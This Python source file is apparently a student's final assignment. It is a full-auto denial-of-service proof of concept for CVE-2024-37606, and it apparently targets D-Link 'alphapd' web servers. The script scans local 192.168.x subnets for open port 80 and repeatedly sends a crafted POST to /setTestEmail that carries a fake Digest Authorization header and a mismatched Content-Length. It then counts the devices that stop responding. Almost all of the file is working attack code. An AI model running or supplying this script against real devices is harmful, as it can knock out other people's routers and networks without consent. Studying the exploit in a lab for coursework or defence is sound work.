import socket
import concurrent.futures
import time
import os
import platform
import sys
import itertools
import subprocess
# ========== UI Stuff ==========
def clear():
    """Clear the terminal: ``cls`` when ``os.name`` is ``"nt"``, ``clear`` otherwise."""
    if os.name == "nt":
        os.system("cls")
    else:
        os.system("clear")
def banner():
    """Print the magenta start-up banner, then pause for one second."""
    # The art lives in a raw string, so its lines stay at column 0 whatever
    # the indentation of the surrounding function.
    art = r"""
██╗████████╗██╗ ██╗██╗███████╗ █████╗ ██████╗ ██████╗ ██████╗
██║╚══██╔══╝██║ ██║██║╚══███╔╝██╔══██╗██╔══██╗██╔══██╗██╔═══██╗
██║ ██║ ██║ █╗ ██║██║ ███╔╝ ███████║██████╔╝██║ ██║██║ ██║
██║ ██║ ██║███╗██║██║ ███╔╝ ██╔══██║██╔══██╗██║ ██║██║ ██║
██║ ██║ ╚███╔███╔╝██║███████╗██║ ██║██║ ██║██████╔╝╚██████╔╝
╚═╝ ╚═╝ ╚══╝╚══╝ ╚═╝╚══════╝╚═╝ ╚═╝╚═╝ ╚═╝╚═════╝ ╚═════╝
CVE-2024-37606 (DOS) • NOVI HOGESCHOOL EINDOPDRACHT
"""
    # ESC[95m switches to bright magenta, ESC[0m resets the terminal colour.
    print(f"\033[95m{art}\033[0m")
    time.sleep(1)
# ========== PoC Payload ==========
def send_poc(ip: str) -> bool:
    """Send the script's CVE-2024-37606 test request to ``ip`` and report whether the peer went silent.

    The request is a raw HTTP/1.1 POST to /setTestEmail on TCP port 80 with
    CRLF line endings. It declares ``Content-Length: 44`` but no body bytes
    follow the blank line, and the Digest nonce, response and cnonce are all
    the literal string "fake". Those fixed values make the request easy to
    match in web-server or IDS logs.

    Returns:
        True only when ``recv`` times out (2 s) after the request was sent.
        False when ``recv`` returns at all (the data is not inspected, so an
        empty read from a closed connection also counts as "responded"), and
        False when any other exception occurs, e.g. the connect fails.

    NOTE(review): a receive timeout is a weak crash signal. A healthy server
    that is still waiting for the 44 declared body bytes would presumably
    stay silent too, so confirm with a separate health check before reading
    True as "crashed".
    """
    # Host is filled with the caller-supplied string as-is; nothing here
    # validates that it is an IP address or free of CR/LF.
    poc = b"""POST /setTestEmail HTTP/1.1\r
Host: %s\r
Content-Length: 44\r
Authorization: Digest username="admin", realm="_00", nonce="fake", response="fake", cnonce="fake"\r
\r
""" % ip.encode()
    try:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            # One 2-second timeout covers connect, send and the single recv.
            s.settimeout(2)
            s.connect((ip, 80))
            s.sendall(poc)
            try:
                # Any return from recv, even b"", is treated as "alive".
                s.recv(1024)
                print(f"[+] {ip}: Responded to PoC (still alive 💡)")
                return False
            except socket.timeout:
                print(f"[!] {ip}: No response after PoC (possible crash 💥)")
                return True
    except Exception:
        # Connect/send failures are swallowed silently, so a host that is
        # already down is reported the same way as one that answered.
        return False
# ========== Port & Process Checking ==========
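def is_http_open(ip):
    """Return True if a TCP connection to ``ip`` on port 80 succeeds within one second.

    Only the TCP handshake is attempted; no HTTP request is sent, so a True
    result does not identify the service or device behind the port.

    Args:
        ip: Host string handed straight to ``socket.connect``.

    Returns:
        True when the connect succeeds, False on any ordinary failure
        (refused, unreachable, timed out, unresolvable or malformed host).
    """
    try:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(1)
            s.connect((ip, 80))
            return True
    except Exception:
        # Was a bare ``except:``, which also swallowed KeyboardInterrupt and
        # SystemExit, so Ctrl-C during a probe was reported as "port closed".
        return False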
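def check_local_alphapd():
    """Return True if the text ``alphapd`` appears anywhere in ``ps aux`` output.

    This is a plain substring test over the whole process listing, so any
    process whose command line or owner contains ``alphapd`` matches, not
    only a running daemon of that name.

    Returns:
        True (after printing a notice) on a match; False when there is no
        match or when ``ps`` cannot be run or its output cannot be decoded.
    """
    try:
        listing = subprocess.check_output(['ps', 'aux'], text=True)
    except (OSError, subprocess.SubprocessError, ValueError):
        # Was a bare ``except:``; narrowed so Ctrl-C and SystemExit propagate.
        # OSError: ``ps`` missing; SubprocessError: non-zero exit;
        # ValueError: output not decodable as text.
        return False
    if 'alphapd' in listing:
        print("[*] Detected 'alphapd' running on local system.")
        return True
    return False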
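def check_qemu_env():
    """Return True if /proc/cpuinfo mentions QEMU, Bochs or TCG.

    The check is a case-sensitive substring search over the whole file.
    Where /proc/cpuinfo cannot be opened or read (for instance on a system
    without it) the function returns False.

    NOTE(review): "TCG" is a short marker and is matched anywhere in the
    file; presumably it targets QEMU's TCG CPU naming. Confirm it does not
    match unrelated cpuinfo text on the hosts this runs on.
    """
    try:
        with open("/proc/cpuinfo") as f:
            cpuinfo = f.read()
    except (OSError, ValueError):
        # Was a bare ``except:``; narrowed so Ctrl-C and SystemExit propagate.
        return False
    if any(marker in cpuinfo for marker in ("QEMU", "Bochs", "TCG")):
        print("[*] Running inside QEMU or emulated env.")
        return True
    return False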
# ========== Smart Network Scanner ==========
def scan_network():
    """Collect every host that accepts a TCP connection on port 80 in the fixed ranges.

    Localhost is checked first (open port 80, or an ``alphapd`` process in
    the local process list), then hosts .1 to .254 of 192.168.0.x and
    192.168.1.x are probed with up to 50 worker threads per subnet.

    No fingerprinting is done: any host answering on port 80 in those
    ranges ends up in the returned list, whatever device it is.

    Returns:
        List of address strings, in completion order for the scanned subnets.
    """
    live_hosts = []

    print("[*] Checking localhost (127.0.0.1)...")
    if is_http_open("127.0.0.1") or check_local_alphapd():
        print("[+] Found service on 127.0.0.1 ✓")
        live_hosts.append("127.0.0.1")

    for subnet in ["192.168.0.", "192.168.1."]:
        print(f"\n[*] Scanning subnet: {subnet}0/24")
        with concurrent.futures.ThreadPoolExecutor(max_workers=50) as pool:
            # Map each pending probe back to the address it is testing.
            pending = {}
            for last_octet in range(1, 255):
                address = f"{subnet}{last_octet}"
                pending[pool.submit(is_http_open, address)] = address

            for done in concurrent.futures.as_completed(pending):
                address = pending[done]
                if not done.result():
                    continue
                print(f"[+] Found web interface on {address}")
                live_hosts.append(address)

    return live_hosts
# ========== Get Target Mode ==========
def get_targets():
    """Ask the operator how targets are chosen and return the resulting address list.

    Modes: "1" reads addresses line by line and keeps those that accept a
    TCP connection on port 80; "2" returns ``scan_network()``; "3" returns
    ``["127.0.0.1"]`` when localhost has port 80 open or an ``alphapd``
    process is listed.

    Entries in mode 1 are used exactly as typed; they are not checked to be
    IP literals before being probed.

    Exits the process with status 0 when no usable target results (modes 1
    and 3) and with status 1 on an unrecognised choice.
    """
    print("\n[*] Select target mode:")
    print("1. Target specific IP address(es)")
    print("2. Scan local network for devices")
    print("3. Target localhost (emulated device)")
    selection = input("\nEnter choice (1-3): ")

    if selection == "2":
        return scan_network()

    if selection == "3":
        if not (is_http_open("127.0.0.1") or check_local_alphapd()):
            print("[-] No service detected on localhost")
            sys.exit(0)
        print("[+] Found service on localhost ✓")
        return ["127.0.0.1"]

    if selection != "1":
        print("[-] Invalid choice.")
        sys.exit(1)

    # Mode 1: manual entry, terminated by an empty line.
    reachable = []
    print("\nEnter IP addresses (one per line, empty line to finish):")
    while True:
        entry = input("> ")
        if not entry:
            break
        if not is_http_open(entry):
            print(f"[-] Cannot connect to {entry} on port 80")
            continue
        print(f"[+] Connection to {entry} successful ✓")
        reachable.append(entry)

    if not reachable:
        print("[-] No valid targets specified.")
        sys.exit(0)
    return reachable
# ========== Main Runner ==========
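if __name__ == "__main__":
    # Entry point: pick targets, ask for a run time, then send the test
    # request to every target in rounds until the time is used up.
    clear()
    banner()
    if check_qemu_env():
        print("⚠️ Emulated environment detected — targeting localhost is recommended.\n")

    targets = get_targets()
    if not targets:
        print("\n[-] No D-Link services found.")
        sys.exit(0)

    try:
        duration = int(input("\n⏱️ How many seconds do you want to run the attack for? "))
    except (ValueError, EOFError):
        # Was a bare ``except:``; narrowed so Ctrl-C at the prompt interrupts
        # the program instead of being reported as invalid input.
        print("Invalid input. Exiting.")
        sys.exit(1)

    print(f"\n[+] Launching full-auto PoC for {duration} seconds...\n")
    start_time = time.time()
    sent_count = 0
    # Distinct hosts for which send_poc() returned True at least once. The
    # summary line speaks of "devices", so count hosts, not timeout events;
    # the previous counter grew on every timeout of the same host.
    silent_hosts = set()
    while time.time() - start_time < duration:
        seconds_left = int(duration - (time.time() - start_time))
        print(f"\r[⏳] Time left: {seconds_left:3} sec | PoCs sent: {sent_count}", end="")
        for ip in targets:
            crashed = send_poc(ip)
            sent_count += 1
            if crashed:
                silent_hosts.add(ip)
        # NOTE(review): indentation was lost on the page; the one-second
        # pause is assumed to run once per round, not once per target.
        time.sleep(1)

    crashed_total = len(silent_hosts)
    print("\n\n✅ Attack completed.")
    print(f"📦 Total PoCs sent: {sent_count}")
    print(f"💥 Devices that stopped responding at some point: {crashed_total}")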